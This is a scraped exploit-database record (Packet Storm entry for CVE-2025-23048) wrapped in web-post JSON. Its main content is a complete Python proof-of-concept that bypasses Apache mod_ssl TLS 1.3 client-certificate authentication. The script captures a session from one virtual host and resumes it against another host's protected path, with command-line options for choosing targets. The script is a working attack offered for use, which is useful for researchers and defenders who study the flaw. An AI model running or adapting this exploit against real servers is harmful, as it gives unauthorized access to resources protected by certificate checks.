{“lastseen”:”2025-12-23T17:16:27″,”description”:”Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:213257″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-23048″],”sourceData”:”=============================================================================================================================================\\n | # Title : Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/httpd.apache.org\/docs\/current\/mod\/mod_ssl.html |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210763\/ \\u0026 CVE-2025-23048\\n \\n [+] Summary : A flaw in Apache mod_ssl TLS 1.3 session resumption allows a client-authenticated TLS session to be resumed across different virtual hosts without re-validating\\n the client certificate or trusted CA configuration.\\n \\n [+] Impact:\\n \\n An attacker with a valid client certificate for one virtual host can gain\\n unauthorized access to another virtual host protected by a different CA.\\n \\n [+] Attack Vector:\\n \\n – TLS 1.3 Session Resumption\\n – Client Certificate Authentication\\n – Multiple Virtual Hosts\\n \\n [+] Tested Environment:\\n \\n – Apache HTTPD with mod_ssl\\n – TLS 1.3 enabled\\n – Client Certificate Authentication enabled\\n – Multiple vhosts with different CA trust stores\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import ssl\\n import socket\\n import sys\\n import argparse\\n from typing import Optional, Tuple\\n import time\\n \\n class CVE2025_23048_Exploit:\\n def __init__(self, host: str, port: int = 443):\\n self.host = host\\n self.port = port\\n self.session_data = None\\n \\n def create_ssl_context(self, \\n certfile: Optional[str] = None,\\n keyfile: Optional[str] = None,\\n cafile: Optional[str] = None,\\n server_hostname: Optional[str] = None) -\\u003e ssl.SSLContext:\\n \\”\\”\\”Create SSL context with specified parameters\\”\\”\\”\\n context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\\n context.minimum_version = ssl.TLSVersion.TLSv1_3\\n context.maximum_version = ssl.TLSVersion.TLSv1_3\\n context.check_hostname = False\\n context.verify_mode = ssl.CERT_NONE\\n \\n if cafile:\\n context.load_verify_locations(cafile)\\n context.verify_mode = ssl.CERT_REQUIRED\\n \\n if certfile and keyfile:\\n context.load_cert_chain(certfile, keyfile)\\n \\n if server_hostname:\\n context.server_hostname = server_hostname\\n \\n return context\\n \\n def perform_full_handshake(self, \\n vhost: str,\\n certfile: str,\\n keyfile: str,\\n cafile: str) -\\u003e Tuple[bool, bytes]:\\n \\”\\”\\”\\n Perform full TLS 1.3 handshake with client certificate\\n Returns: (success, session_data)\\n \\”\\”\\”\\n print(f\\”[+] Performing full TLS 1.3 handshake with {vhost}\\”)\\n \\n context = self.create_ssl_context(\\n certfile=certfile,\\n keyfile=keyfile,\\n cafile=cafile,\\n server_hostname=vhost\\n )\\n \\n try:\\n # Create socket and wrap with SSL\\n sock = socket.create_connection((self.host, self.port))\\n ssl_sock = context.wrap_socket(sock, server_hostname=vhost)\\n \\n # Get session data for resumption\\n self.session_data = ssl_sock.session\\n \\n # Test access\\n request = f\\”GET \/ HTTP\/1.1\\\\r\\\\nHost: {vhost}\\\\r\\\\n\\\\r\\\\n\\”\\n ssl_sock.send(request.encode())\\n response = ssl_sock.recv(4096)\\n \\n print(f\\”[*] Connected to {vhost}\\”)\\n print(f\\”[*] HTTP Status: {response.decode().split(‘\\\\\\\\r\\\\\\\\n’)[0]}\\”)\\n print(f\\”[*] Session ticket captured: {self.session_data is not None}\\”)\\n \\n ssl_sock.close()\\n return True, self.session_data\\n \\n except Exception as e:\\n print(f\\”[-] Error during full handshake: {e}\\”)\\n return False, None\\n \\n def resume_session(self, \\n vhost: str,\\n session_data: bytes,\\n cafile: Optional[str] = None,\\n protected_path: str = \\”\/\\”) -\\u003e bool:\\n \\”\\”\\”\\n Resume TLS session to different vhost\\n Returns: True if bypass successful\\n \\”\\”\\”\\n print(f\\”\\\\n[+] Attempting session resumption to {vhost}\\”)\\n \\n context = self.create_ssl_context(\\n cafile=cafile,\\n server_hostname=vhost\\n )\\n \\n try:\\n # Set the session for resumption\\n context.session = session_data\\n \\n # Connect with session resumption\\n sock = socket.create_connection((self.host, self.port))\\n ssl_sock = context.wrap_socket(sock, server_hostname=vhost)\\n \\n # Check if session was resumed\\n if ssl_sock.session_reused:\\n print(f\\”[!] SUCCESS: Session resumed to {vhost}\\”)\\n \\n # Try to access protected resource\\n request = f\\”GET {protected_path} HTTP\/1.1\\\\r\\\\nHost: {vhost}\\\\r\\\\n\\\\r\\\\n\\”\\n ssl_sock.send(request.encode())\\n response = ssl_sock.recv(8192)\\n \\n response_str = response.decode(‘utf-8′, errors=’ignore’)\\n status_line = response_str.split(‘\\\\r\\\\n’)[0]\\n \\n print(f\\”[*] HTTP Response: {status_line}\\”)\\n \\n # Check if access was granted\\n if \\”200 OK\\” in status_line:\\n print(f\\”[!] CRITICAL: Unauthorized access successful!\\”)\\n print(f\\”[!] Accessed {protected_path} on {vhost} without valid certificate\\”)\\n \\n # Extract some response content\\n if \\”Vhost2 Secret\\” in response_str or \\”Restricted\\” in response_str:\\n print(f\\”[!] Confirmed access to protected content!\\”)\\n # Print snippet of response\\n lines = response_str.split(‘\\\\r\\\\n’)\\n for line in lines[-10:]: # Last 10 lines\\n if line.strip():\\n print(f\\” Content: {line[:100]}…\\”)\\n \\n return True\\n else:\\n print(f\\”[-] Access denied: {status_line}\\”)\\n return False\\n else:\\n print(\\”[-] Session was not resumed (full handshake occurred)\\”)\\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Error during session resumption: {e}\\”)\\n return False\\n \\n def exploit(self, \\n vhost1: str,\\n cert1: str,\\n key1: str,\\n ca1: str,\\n vhost2: str,\\n ca2: str,\\n protected_path: str = \\”\/restricted\/\\”):\\n \\”\\”\\”\\n Complete exploitation chain\\n \\”\\”\\”\\n print(f\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass By indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n Target: {self.host}:{self.port}\\n Vhost1: {vhost1} (Legitimate access with CA1)\\n Vhost2: {vhost2} (Should require CA2)\\n Protected Path: {protected_path}\\n \\”\\”\\”)\\n \\n # Step 1: Authenticate to vhost1\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”STEP 1: Legitimate authentication to first vhost\\”)\\n print(\\”=\\”*60)\\n \\n success, session = self.perform_full_handshake(vhost1, cert1, key1, ca1)\\n \\n if not success or not session:\\n print(\\”[-] Failed to establish initial session\\”)\\n return False\\n \\n # Small delay\\n time.sleep(1)\\n \\n # Step 2: Resume session to vhost2\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”STEP 2: Session resumption attack on second vhost\\”)\\n print(\\”=\\”*60)\\n \\n # Try with CA2 (should fail in proper validation)\\n # But with the vulnerability, session will be resumed without validation\\n bypass_success = self.resume_session(\\n vhost2, \\n session, \\n ca2, # This CA won’t be properly checked during resumption\\n protected_path\\n )\\n \\n # Try also without any CA file (shouldn’t work but demonstrates the bug)\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”STEP 3: Testing without any CA validation\\”)\\n print(\\”=\\”*60)\\n \\n bypass_without_ca = self.resume_session(\\n vhost2,\\n session,\\n None, # No CA file at all\\n protected_path\\n )\\n \\n if bypass_success or bypass_without_ca:\\n print(\\”\\\\n[!] EXPLOIT SUCCESSFUL!\\”)\\n print(\\”[!] Client certificate authentication was bypassed\\”)\\n return True\\n else:\\n print(\\”\\\\n[-] Exploit failed\\”)\\n return False\\n \\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass By indoushka\\”\\n )\\n parser.add_argument(\\”–host\\”, required=True, help=\\”Target Apache server IP\\”)\\n parser.add_argument(\\”–port\\”, type=int, default=443, help=\\”HTTPS port (default: 443)\\”)\\n parser.add_argument(\\”–vhost1\\”, required=True, help=\\”First virtual hostname\\”)\\n parser.add_argument(\\”–cert1\\”, required=True, help=\\”Client certificate for vhost1\\”)\\n parser.add_argument(\\”–key1\\”, required=True, help=\\”Client private key for vhost1\\”)\\n parser.add_argument(\\”–ca1\\”, required=True, help=\\”CA certificate for vhost1\\”)\\n parser.add_argument(\\”–vhost2\\”, required=True, help=\\”Second virtual hostname to attack\\”)\\n parser.add_argument(\\”–ca2\\”, required=True, help=\\”CA certificate that vhost2 should trust\\”)\\n parser.add_argument(\\”–path\\”, default=\\”\/restricted\/\\”, help=\\”Protected path on vhost2\\”)\\n \\n args = parser.parse_args()\\n \\n # Check if required files exist\\n import os\\n for file in [args.cert1, args.key1, args.ca1, args.ca2]:\\n if not os.path.exists(file):\\n print(f\\”[-] File not found: {file}\\”)\\n return\\n \\n exploit = CVE2025_23048_Exploit(args.host, args.port)\\n exploit.exploit(\\n vhost1=args.vhost1,\\n cert1=args.cert1,\\n key1=args.key1,\\n ca1=args.ca1,\\n vhost2=args.vhost2,\\n ca2=args.ca2,\\n protected_path=args.path\\n )\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213257″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213257\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-23T17:16:27″,”description”:”Apache modssl TLS 1.3 client certificate authentication bypass proof of concept exploit…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache mod_ssl TLS 1.3 Client Certificate Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:213257″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-23048″],”sourceData”:”=============================================================================================================================================\\n | # Title : Apache…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-32547","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n